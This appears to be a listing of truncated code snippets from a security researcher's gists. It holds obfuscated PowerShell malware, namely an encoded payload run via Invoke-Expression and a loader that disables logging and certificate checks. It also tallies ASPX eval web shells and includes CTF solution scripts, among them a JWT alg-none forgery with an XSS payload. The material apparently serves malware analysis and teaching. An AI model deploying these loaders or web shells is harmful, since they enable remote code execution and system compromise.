JohnHammond

[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
try{
        $name = 'Global\PSEXEC'
        $exeflag = $flase
        New-Object System.Threading.Mutex ($true,$name,[ref]$exeflag)
}catch{}
​
$dt = Get-Date -Format 'yyMMdd'
$path = "$env:temp\\ccc.log"
[string]$flag = test-path $path

JohnHammond

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivte0dbG8+P7vtsim6Wfp1kXe4re7z75MT17/5M+8zst82m5/Oflp+pFuv35brNLddPu8qJs23f2Z9KRaXuZ1+6yuFtsnzWW6/e08m+V1+sXxyc808m6l7+bvVtlyhm/u/MZJW1//4t84+bHfbZktcur248/LapKVv+/L16e/9+nJx/gmf5efl9kFffm70c8mp89e5FcGk9fXTZsvxm/mNfVH+I+/WLf5u3Trd2vrdT5isKPv1fn59w0c6vOXTLN2Ov/Fv+Q3Tn7j5HebtQT587zdfpq1ebr9rKoXWZt+fH39xRezGSHwu62ydk5NPvrd8uXlI+pr9fv+vtPpdFxWFx/9xomlmqLY5k27zW/we3g9rxcF+ki3vvc6n67ror0ev6SXpsUqK8ffLZaz6qqxH3x/Q6OzWb5s6ZvvP3pECJ+s65r+3rpzZ3zWnC1fVWW+qYcn66Jspdn304+OZ4tiWRDyWVvVHxFNfre3+TVGSXP+2UefgAk++egXZpf4PbukX2lym6Ja0t9bINZ3F4VhhROalCalXu7t/f5f0mizlggi03JnrK8RgEnR9l8eeOvL18f1dF601GRd5+kn6Ue/EPTd++wj+l1Ijc9m1SIrlvxhB+4Vw51WixVxQ90o2Kfcnl9dN3kt0DCrX70+ffXi+ItT/urla/1C+OU3TorzLelzO/9F6cfPsrLJP77zi5UNzwiyzHW63V6v8vS8KMGieEmmnpv+mPL5j/1

JohnHammond

# Occurrences, WebShell Source
190, <script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script>
50, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
11, <script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
7, <script language="JScript" runat="server">function Page_Load(){eval(Request["error"],"unsafe");}</script>
5, <script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["7gHQRih3fnam"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["coStWhkzUF7n"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["E9RyGFIM8h3S"],"unsafe");}</script>
1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EiH4yV2

JohnHammond

JohnHammond

# Run ltrace
ltrace ./Challenge.Challenge

# Enter a bogus username to see the `strcmp` instruction and see the correct answer.

# Get the flag
echo "AGB6js5d9dkG7" | ./Challenge.Challenge

JohnHammond

0..4|%{try
{
    $LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
    $u=[System.Text.Encoding]::UTF8;
    sAl er Get-Random;
    $l=[System.Net.WebRequest];
    sAL no New-Object;
    $g=[SysTEm.Net.SeRvICePoIntMAnaGEr];
    $g::Expect100ConTINuE=0;
    $g::ServerCertificateValidationCallback={1};

JohnHammond

{
  "Status": 0,
  "TC": false,
  "RD": true,
  "RA": true,
  "AD": false,
  "CD": false,
  "Question": [
    {
      "name": "dmarc.jqueryupdatejs.com.",

JohnHammond

#!/bin/bash

exiftool -b favicon/00000.png | dd bs=1 skip=156 | head -c -84 2>/dev/null > file
for i in {00001..00109}
do
	exiftool -b favicon/$i.png | dd bs=1 skip=156 | head -c -84 2>/dev/null >> file
done
strings file | grep -i "IceCTF" --color=none | tail -n 1

JohnHammond

#!/usr/bin/env python

first_piece = '{  "typ": "JWT", "alg": "none" }'

our_xss = '<script>alert("xss")</script>'

second_piece = '''
{ "username": "%s",  
"flag": "IceCTF{hope you don\'t think this is a real flag}"}''' \
% our_xss.replace('"','\\"')

JohnHammond

#!/usr/bin/env python

import re
h = open('secret.c')
lines = [ x[:-1] for x in h.readlines() ]  # remove newline char
h.close()

flag = []
for line in lines:
    num =''.join(re.findall(r'\s+', line)).replace('\t','1').replace(' ','0')